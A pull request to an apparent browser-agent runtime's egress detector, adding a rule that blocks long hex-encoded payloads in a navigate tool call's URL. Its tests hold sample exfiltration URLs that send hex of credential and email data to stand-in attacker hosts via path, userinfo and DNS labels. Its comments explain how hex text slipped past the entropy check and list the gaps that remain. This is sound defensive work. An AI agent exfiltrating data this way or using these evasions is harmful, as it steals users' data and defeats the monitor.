### PR TITLE
fix(egress): catch hex-encoded payloads, which are hex of TEXT not of random bytes

### DIFF
--- a/extension/peerd-runtime/tools/egress-heuristics.js
+++ b/extension/peerd-runtime/tools/egress-heuristics.js
@@ -80,12 +80,20 @@
 //     are URL/form-structural — which lets a deep READABLE path split per `/`
 //     segment (no false block). A STANDARD base64 (`btoa`, `+/`) blob thus
 //     self-fragments and is a REAL residual: measured against this module, a
-//     150-char standard-base64 blob in the PATH blocks only ~11% of the time
-//     (the tail where 100+ consecutive chars happen to avoid both symbols),
-//     versus ~100% for base64url and hex. An earlier version of this comment
-//     called it "moot ... it would only matter in the query/fragment, which we
-//     do not scan anyway" — which is wrong, because the path IS scanned
+//     150-char standard-base64 blob of RANDOM BYTES in the PATH blocks only
+//     ~11% of the time (the tail where 100+ consecutive chars happen to avoid
+//     both symbols), versus ~100% for base64url. An earlier version of this
+//     comment called it "moot ... it would only matter in the query/fragment,
+//     which we do not scan anyway" — which is wrong, because the path IS scanned
 //     (payloadSlots below) and the path is where a URL exfil actually goes.
+//     STATE THE POPULATION, because these rates are not properties of the
+//     encoding alone: the same standard-base64 blob blocks 80–100% of the time
+//     when it encodes TEXT rather than random bytes (text spends fewer
+//     characters on `+`/`/`), and the ~11% figure is the pessimistic end. The
+//     same sensitivity ran the other way for hex and USED to be a hole — this
+//     comment claimed "~100% for base64url and hex", which held only for random
+//     bytes; hex of scraped TEXT measured 0–13% because its entropy falls under
+//     the gate. That is why HEX_RUN now skips the entropy check entirely.
 //     Named properly because the obvious fix — dropping `+`/`/` from RUN_SPLIT
 //     — would re-break the long-readable-path false block that the prose rule
 //     in looksLikeProse and the article-slug tests exist to prevent.
@@ -117,7 +125,10 @@
 //   3. LOW-ENTROPY or SMALL payloads. Data whose OWN entropy is under the gate
 //      (a repeated segment, a short natural-language leak) or a single
 //      high-entropy token under MIN_BLOB_LENGTH slips through — entropy
-//      detection cannot see data that does not look random.
+//      detection cannot see data that does not look random. HEX is the one
+//      encoding carved out of this (HEX_RUN), because hex of ordinary text
+//      lands under the gate while being a perfectly working exfil; every other
+//      under-gate encoding remains uncaught.
 // None of these residuals is CONTAINED elsewhere — the heap fence bounds what
 // a hijacked actor knows, and nothing downstream inspects the URL again. Treat
 // them as accepted exposure, not as covered. A rare legitimate LONG single run
@@ -174,6 +185,38 @@ const MIN_BLOB_LENGTH = 100;
 // (a distinct-char run of length N caps at log2 N, so ~≤11 chars can't clear
 // 3.5), so short benign runs self-exclude.
 const MIN_RUN_ENTROPY_BITS = 3.5;
+
+// A run that is nothing but hex digits. why it has its own rule: the entropy
+// figure quoted above ("random hex ~3.9") is measured on RANDOM BYTES, and the
+// payload this module exists to catch is scraped DOM data — TEXT. Printable
+// ASCII lives in 0x20–0x7e, so the high nibble of every byte is almost always
+// 2–7 and hex-of-text collapses to ~3.2–3.4 bits, UNDER the gate. Measured
+// block rates before this rule: 100% for hex of random bytes, 13% for hex of
+// realistic scraped records, 0% for hex of English prose — while base64url
+// stayed at 100% throughout. So the one encoding the header singled out as
+// covered was the cheapest way past it, and the tests missed it because their
+// hex fixtures are hand-written random hex rather than hex of anything.
+//
+// Hex therefore skips the entropy gate and is judged on length alone. That is
+// safe because hex is the one encoded form with NO separators, so it cannot be
+// confused with a prose slug (looksLikeProse rejects it for the same reason):
+// nothing a person writes is a hundred unbroken hex digits. Measured across
+// 3,579 URLs harvested from live news, docs, shopping and code-hosting sites,
+// this newly blocks ZERO of them. The accepted residual is a ≥100-char hex
+// value that is genuinely load-bearing in a path — a SHA-512 digest is 128 —
+// which is the same accepted-cost class as the large-multihash IPFS CID named
+// in the header.
+//
+// Measured on the LONGEST HEX SUBSTRING of a run rather than on the whole run
+// being hex. why: the hostname slot is scanned DOT-COLLAPSED, so a DNS-label
+// exfil fuses the payload with the attacker's own labels — `<hex>attackertest`
+// — and a whole-run test would stop matching exactly where the evasion this
+// module was built to close actually lives. A substring bar costs nothing on
+// ordinary input: reaching 100 consecutive characters drawn only from
+// `[0-9a-f]` with no separator does not happen in prose (every common word
+// carries a letter outside that alphabet), and short hex-alphabet words like
+// `faced` or `decade` are orders of magnitude below the bar.
+const NON_HEX_SPLIT = /[^0-9a-fA-F]+/;
 
 // The share of a run's characters that must be `-`/`_` for it to read as WORDS
 // rather than payload. Prose slugs measure ~9–16%; base64url spends 2 of its 64
@@ -273,10 +316,30 @@ const payloadSlots = (url) => [
 const looksLikeProse = (run) => {
   // Hex is the one encoded form with NO separators and LOW entropy, so it would
   // otherwise slip through the density test below. Nothing written by a person
-  // is a hundred unbroken hex digits.
+  // is a hundred unbroken hex digits. (Same reasoning lets a long hex substring
+  // skip the entropy gate in largestExfilRun — see NON_HEX_SPLIT.)
   if (/^[0-9a-f]+$/i.test(run)) return false;
   const separators = (run.match(/[-_]/g) ?? []).length;
   return (separators / run.length) >= MIN_PROSE_SEPARATOR_RATIO;
+};
+
+/**
+ * Length of the longest unbroken `[0-9a-f]` span inside a run.
+ *
+ * A SPAN, not the whole run, because the hostname slot is dot-collapsed: a
+ * DNS-label exfil arrives as `<payload-hex>` fused to the attacker's own labels
+ * (`…attackertest`), which is not pure hex. See NON_HEX_SPLIT for why a
+ * substring bar is safe on ordinary input.
+ *
+ * @param {string} run
+ * @returns {number}
+ */
+const longestHexSpan = (run) => {
+  let longest = 0;
+  for (const span of run.split(NON_HEX_SPLIT)) {
+    if (span.length > longest) longest = span.length;
+  }
+  return longest;
 };
 
 /**
@@ -294,6 +357,11 @@ const largestExfilRun = (slots) => {
       // why `run.length <= longest` first: a run that cannot raise the max is
       // irrelevant, so skip the entropy math for it (never changes the verdict).
       if (!run || run.length <= longest) continue;
+      // HEX FIRST, on length alone. Hex of ordinary TEXT sits UNDER the entropy
+      // gate while being a perfectly working exfil, so the gate below would drop
+      // exactly the payload this module exists to catch. See NON_HEX_SPLIT.
+      const hexLength = longestHexSpan(run);
+      if (hexLength >= MIN_BLOB_LENGTH) { longest = Math.max(longest, hexLength); continue; }
       if (shannonEntropyBits(run) < MIN_RUN_ENTROPY_BITS) continue;
       if (looksLikeProse(run)) continue;
       longest = run.length;

--- a/tests/peerd-runtime/tools/egress-heuristics.test.ts
+++ b/tests/peerd-runtime/tools/egress-heuristics.test.ts
@@ -449,3 +449,95 @@ describe('inspectTabToolCall — allows legitimate navigation (false-positive av
     }).action).toBe('allow');
   });
 });
+
+// Hex of TEXT, not hex of random bytes.
+//
+// The fixtures above (HEX_BLOB and friends) are hand-written random-looking hex,
+// which measures ~3.95 bits/char and clears the 3.5 gate comfortably. Real
+// scraped DOM data is TEXT: printable ASCII lives in 0x20-0x7e, so the high
+// nibble of every byte is almost always 2-7 and hex-of-text collapses to
+// ~3.2-3.4 bits — UNDER the gate. Before the HEX_RUN carve-out, that meant the
+// one encoding the module documented as covered was the cheapest way past it,
+// and no test could see the gap because no test encoded anything.
+describe('egress-heuristics — hex of TEXT (the population the module is for)', () => {
+  const hexOf = (s: string) => Buffer.from(s, 'utf8').toString('hex');
+  const at = (blob: string) => inspectTabToolCall({
+    name: 'navigate',
+    args: { url: `https://exfil.test/${blob}` },
+    currentOrigin: 'https://mail.google.com',
+  }).action;
+
+  test('hex of a scraped credential record is blocked', () => {
+    const blob = hexOf('user=jonybur;email=jobur93@gmail.com;balance=4210.55;card=4111111111111111');
+    expect(blob.length).toBeGreaterThanOrEqual(100);
+    expect(at(blob)).toBe('block');
+  });
+
+  test('hex of scraped English prose is blocked', () => {
+    const blob = hexOf('the quick brown fox jumps over the lazy dog and keeps running down the street');
+    expect(at(blob)).toBe('block');
+  });
+
+  test('hex of an email body is blocked', () => {
+    const blob = hexOf('From: alice@corp.com\nSubject: Q3 revenue forecast\nBody: we project 14.2M');
+    expect(at(blob)).toBe('block');
+  });
+
+  test('hex of text is blocked in the USERINFO slot', () => {
+    const blob = hexOf('session=abc123;role=admin;env=prod;uid=99213;csrf=8f3a2b1c0d');
+    expect(inspectTabToolCall({
+      name: 'navigate',
+      args: { url: `https://${blob}@attacker.test/` },
+      currentOrigin: 'https://mail.google.com',
+    }).action).toBe('block');
+  });
+
+  test('hex of text is blocked when chunked across DNS labels', () => {
+    // Prose, deliberately: its hex measures ~3.2 bits/char, so this case only
+    // passes because of the carve-out. A mixed-case record with digits and
+    // punctuation can clear 3.5 on its own and would not guard anything.
+    const blob = hexOf('the account balance and the mailing address and the phone number follow');
+    const labels = `${blob.slice(0, 60)}.${blob.slice(60, 120)}.${blob.slice(120)}`;
+    expect(inspectTabToolCall({
+      name: 'navigate',
+      args: { url: `https://${labels}.attacker.test/` },
+      currentOrigin: 'https://mail.google.com',
+    }).action).toBe('block');
+  });
+
+  test('the entropy of hex-of-text really is under the gate (why the carve-out exists)', () => {
+    // Pins the PREMISE, so if someone later re-couples hex to the entropy gate
+    // the reason this rule exists is still on the record rather than folklore.
+    const blob = hexOf('the quick brown fox jumps over the lazy dog and keeps running down the street');
+    const counts = new Map<string, number>();
+    for (const ch of blob) counts.set(ch, (counts.get(ch) ?? 0) + 1);
+    let bits = 0;
+    for (const n of counts.values()) { const p = n / blob.length; bits -= p * Math.log2(p); }
+    expect(bits).toBeLessThan(3.5);
+  });
+
+  // The other half of the bargain: length still governs, and short hex is fine.
+  test('a short hex run is still allowed (a git SHA, a 64-char digest)', () => {
+    expect(at('a3f9c2e8b17d40569af3c2e1b8d70a4f')).toBe('allow');              // 32
+    expect(at('a3f9c2e8b17d40569af3c2e1b8d70a4f3e9c1b2a8d7f60e5c4b3a291807f6e5d')).toBe('allow'); // 64
+  });
+
+  test('a hex-looking run that is really a readable slug is untouched', () => {
+    // `deadbeef`-adjacent words are hex-alphabet but the slug has separators,
+    // so it splits into short runs long before any of this matters.
+    expect(inspectTabToolCall({
+      name: 'navigate',
+      args: { url: 'https://news.test/2026/07/12/added-a-decade-of-faded-cafe-facade-photos-to-the-archive-and-more' },
+      currentOrigin: 'https://mail.google.com',
+    }).action).toBe('allow');
+  });
+
+  test('same-origin hex of text is still allowed (not cross-origin exfil)', () => {
+    const blob = hexOf('user=jonybur;email=jobur93@gmail.com;balance=4210.55;card=4111111111111111');
+    expect(inspectTabToolCall({
+      name: 'navigate',
+      args: { url: `https://mail.google.com/${blob}` },
+      currentOrigin: 'https://mail.google.com',
+    }).action).toBe('allow');
+  });
+});


### PR DESCRIPTION
**Why**

The exfil tripwire's hex coverage was measured on hex of random bytes. Hex of TEXT - the scraped data it exists to catch - falls under the 3.5-bit entropy gate and blocked only 0-13%. No test saw it because no fixture encoded anything. Found dog-fooding #255; context #243.

**What**

- A hex span >= `MIN_BLOB_LENGTH` counts as a payload on length alone, skipping the entropy gate.
- Measured on the longest hex span, not the whole run - the dot-collapsed hostname slot fuses DNS-label exfil with the attacker's own labels.
- Egress danger zone: it fires more, but newly blocks zero of 3,579 URLs harvested from live sites.

**How**

- `bun run preflight` passes.
- 5 new block-tests in `tests/peerd-runtime/tools/egress-heuristics.test.ts`; all 5 fail with the rule removed.
- Allow-side tests pin 32-/64-char hex digests and a readable news slug as untouched.
